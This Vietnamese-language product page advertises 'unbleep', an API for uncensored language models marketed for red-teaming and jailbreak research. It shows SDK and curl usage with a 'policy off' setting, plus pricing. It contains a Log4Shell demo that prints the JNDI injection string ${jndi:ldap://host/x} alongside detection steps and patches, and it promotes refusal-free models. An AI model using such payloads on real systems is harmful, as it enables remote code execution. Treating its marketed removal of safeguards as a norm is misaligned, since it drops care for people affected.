Các mô hình phổ biến trả lời bằng một tiếng bíp. Chúng tôi gỡ nó đi.
API tương thích OpenAI, ưu tiên lập trình viên, cho các mô hình không bị giới hạn — dành cho red-teaming, đánh giá jailbreak, nghiên cứu an toàn AI, và bất cứ thứ gì không thể chấp nhận một lời từ chối giả tạo.
Được đặt tên theo việc chúng làm, không theo mô hình mã nguồn mở bên dưới — nên chúng tôi có thể cải tiến trọng số mà không bao giờ làm hỏng mã của bạn.
Lựa chọn mặc định. Cửa sổ ngữ cảnh 256K token, không kiểm duyệt — con ngựa thồ hằng ngày cho red-teaming, đánh giá và nghiên cứu.
Bậc cao nhất. Ngữ cảnh 1M token cho những tác vụ lớn nhất — toàn bộ codebase, bản ghi dài, phân tích sâu nhiều tài liệu.
Lựa chọn rẻ và nhanh. Chi phí mỗi token thấp hơn cho lưu lượng lớn và các lời gọi đơn giản.
Một phiên red-team về Log4Shell — nguyên nhân gốc, cách kiểm tra an toàn trong lab, và bản vá. Không thuyết giảng, không từ chối; chỉ có phân tích.
CVE-2021-44228 (Log4Shell). Nguyên nhân gốc, và cách JNDI lookup biến thành RCE.${…} bên trong chuỗi mà nó ghi log. Một giá trị được ghi log như ${jndi:ldap://host/x} khiến JVM phân giải tên đó qua LDAP/RMI, tải một lớp Java từ xa và khởi tạo nó — mã tùy ý chạy trong tiến trình ghi log. Bề mặt kích hoạt là bất cứ thứ gì đi tới một lời gọi log: User-Agent, header, trường biểu mẫu. Phạm vi ảnh hưởng: 2.0-beta9 → 2.14.1.${jndi:ldap://<token>.your-collab/x} trong một header mà bạn biết chắc sẽ được ghi log.<token> nghĩa là chuỗi đã được nội suy → có lỗ hổng. Không có gì được phục vụ, nên không có gì được thực thi.JndiLookup.class và đối chiếu phiên bản với phạm vi ảnh hưởng.2.17.1+. Chưa thể? Đặt log4j2.formatMsgNoLookups=true (2.10+) hoặc loại bỏ JndiLookup.class khỏi classpath, thêm quy tắc WAF cho ${jndi:, và lọc egress LDAP/RMI đi ra từ máy chủ.API tương thích OpenAI theo kiểu thay thế trực tiếp. Đổi base URL và khóa — mã hiện có, SDK và công cụ của bạn vẫn chạy như cũ.
from openai import OpenAI
client = OpenAI(
base_url="https://unbleep.ai/v1", # ← the only change
api_key="ub_live_9f2c…",
)
stream = client.chat.completions.create(
model="unbleep",
messages=[{"role": "user", "content": "…"}],
stream=True,
)
for chunk in stream:
print(chunk.choices[0].delta.content or "", end="")
import OpenAI from "openai";
const client = new OpenAI({
baseURL: "https://unbleep.ai/v1", // ← the only change
apiKey: "ub_live_9f2c…",
});
const stream = await client.chat.completions.create({
model: "unbleep",
messages: [{ role: "user", content: "…" }],
stream: true,
});
for await (const chunk of stream)
process.stdout.write(chunk.choices[0].delta.content ?? "");
curl https://unbleep.ai/v1/chat/completions \
-H "Authorization: Bearer ub_live_9f2c…" \
-H "Content-Type: application/json" \
-d '{
"model": "unbleep",
"messages": [{"role":"user","content":"…"}],
"stream": true,
"policy": "off"
}'
OpenAI Python, Node, và bất kỳ công cụ nào nói được Chat Completions API. Không có gì mới phải học.
text/event-stream gồm các delta chunk, kết thúc bằng [DONE] — đúng thứ client của bạn đã phân tích được.
Gửi "policy": "research" để gắn thẻ một yêu cầu trong lịch sử sử dụng của bạn, hoặc "strict" để áp dụng danh sách chặn, khi dự án cần.
Mua tín dụng bất cứ khi nào bạn cần, hoặc dùng gói hằng tháng để tín dụng tự về. Mỗi yêu cầu được tính trên số token thực tế đã dùng, theo mức giá công bố trên mỗi triệu token của mô hình bạn gọi.
unbleep $3.00 vào / $3.00 ra
unbleep-high $5.00 / $5.00
unbleep-mini $1.00 / $1.00
trên 1M token
Nạp tín dụng bằng thẻ bất cứ khi nào bạn cần, hoặc để một gói chuyển tín dụng về mỗi tháng. Tín dụng không hết hạn khi tài khoản còn mở, và tín dụng chưa dùng được hoàn lại trong vòng 14 ngày.
Chúng tôi giữ trước một khoản ước tính khi yêu cầu bắt đầu và quyết toán theo chi phí token thực khi nó kết thúc. Yêu cầu gặp lỗi được giải phóng, không bao giờ bị tính tiền.
Yêu cầu bị từ chối khi số dư của bạn không đủ chi trả — chúng tôi không bao giờ cho nợ hay tính phí sau. Số dư và mức chi token đều có trong console.
unbleep dành cho các đội bảo mật, nhà nghiên cứu và người xây dựng sản phẩm cần một đường cơ sở không bị lọc. Mặc định không lưu giữ, một núm chính sách hạng nhất, lịch sử sử dụng và chi phí theo từng yêu cầu trong console, và một chính sách sử dụng chấp nhận được thực sự. Không kiểm duyệt là một năng lực — bạn quyết định cách quản trị nó.